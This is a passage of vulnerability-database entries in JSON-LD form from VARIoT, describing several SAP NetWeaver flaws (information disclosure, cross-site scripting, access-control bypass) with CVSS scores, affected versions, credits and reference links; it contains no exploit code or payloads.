"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201710-1465",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "101211"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported the issue.",
"sources": [
{
"db": "BID",
"id": "101211"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to an information-disclosure vulnerability.\nAttackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.",
"sources": [
{
"db": "BID",
"id": "101211"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "101211",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "101211"
}
]
},
"id": "VAR-201710-1465",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T01:47:53.481000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "sap security note-2527770 sap advisory"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/10/10/sap-security-patch-day-october-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "101211"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "101211"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101211"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-10T00:00:00",
"db": "BID",
"id": "101211"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "101211"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver System Landscape Directory Information Disclosure Vulnerability",
"sources": [
{
"db": "BID",
"id": "101211"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "101211"
}
],
"trust": 0.3
}
}
var-201011-0284
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The ConnectionMonitorServlet and CatalogBufferMonitorServlet scripts included in SAP NetWeaver lack sufficient filtering for the connid and reqTableColumns parameters. Attackers can send links to administrators to obtain sensitive information such as COOKIE. The SQL Monitor of SAP NetWeaver is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201011-0284",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.9,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.02*"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "7.01*"
}
],
"sources": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"db": "BID",
"id": "44904"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "a.polyakov and a.troshichev from Digital Security Research Group",
"sources": [
{
"db": "BID",
"id": "44904"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The ConnectionMonitorServlet and CatalogBufferMonitorServlet scripts included in SAP NetWeaver lack sufficient filtering for the connid and reqTableColumns parameters. Attackers can send links to administrators to obtain sensitive information such as COOKIE. The SQL Monitor of SAP NetWeaver is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. \nAn attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"db": "BID",
"id": "44904"
},
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "44904",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2010-2847",
"trust": 0.8
},
{
"db": "IVD",
"id": "5DE2084E-1FA8-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"db": "BID",
"id": "44904"
}
]
},
"id": "VAR-201011-0284",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2847"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2847"
}
]
},
"last_update_date": "2022-05-17T02:04:50.268000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver SQL Monitor patch for multiple cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/1765"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2847"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=156http"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=156"
},
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/1391770"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"db": "BID",
"id": "44904"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"db": "BID",
"id": "44904"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-18T00:00:00",
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"date": "2010-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"date": "2010-11-17T00:00:00",
"db": "BID",
"id": "44904"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-2847"
},
{
"date": "2010-11-17T00:00:00",
"db": "BID",
"id": "44904"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "44904"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver SQL Monitor Multiple Cross-Site Scripting Vulnerabilities",
"sources": [
{
"db": "IVD",
"id": "5de2084e-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2847"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "44904"
}
],
"trust": 0.3
}
}
var-201311-0369
Vulnerability from variot
GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors. SAP NetWeaver is prone to a security-bypass vulnerability and an information-disclosure vulnerability. Successful exploits may allow an attacker to obtain sensitive information or bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0369",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.02"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.01"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6823"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Dmitry Chastukhin of ERPScan",
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
],
"trust": 0.9
},
"cve": "CVE-2013-6823",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.4,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2013-6823",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2013-6823",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201311-294",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "GRMGApp in SAP NetWeaver allows remote attackers to bypass intended access restrictions via unspecified vectors. SAP NetWeaver is prone to a security-bypass vulnerability and an information-disclosure vulnerability. \nSuccessful exploits may allow an attacker to obtain sensitive information or bypass certain security restrictions and perform unauthorized actions. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "BID",
"id": "58095"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-6823",
"trust": 2.7
},
{
"db": "BID",
"id": "58095",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005202",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201311-294",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484",
"trust": 0.6
}
],
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"id": "VAR-201311-0369",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:58:04.808000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-264",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "NVD",
"id": "CVE-2013-6823"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.4,
"url": "http://erpscan.com/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
},
{
"trust": 1.0,
"url": "https://erpscan.io/advisories/dsecrg-13-002-sap-grmgapp-xxe-and-authentication-bypass/"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-6823"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-6823"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/58095"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
}
],
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "58095"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-01-28T00:00:00",
"db": "BID",
"id": "58095"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"date": "2013-11-20T14:12:31.037000",
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-294"
},
{
"date": "2013-01-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-25T01:04:00",
"db": "BID",
"id": "58095"
},
{
"date": "2013-11-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005202"
},
{
"date": "2018-12-10T19:29:02.187000",
"db": "NVD",
"id": "CVE-2013-6823"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201311-294"
},
{
"date": "2013-02-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver GRMGApp Security Bypass and Information Disclosure Vulnerabilities",
"sources": [
{
"db": "BID",
"id": "58095"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-484"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "permissions and access control",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201311-294"
}
],
"trust": 0.6
}
}
var-201809-0959
Vulnerability from variot
The logon application of SAP NetWeaver AS Java 7.10 to 7.11, 7.20, 7.30, 7.31, 7.40, 7.50 does not sufficiently encode user-controlled inputs, resulting in a cross-site scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SAP NetWeaver AS Java 7.10 through 7.11, 7.20, 7.30, 7.31, 7.40 and 7.50 are vulnerable
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
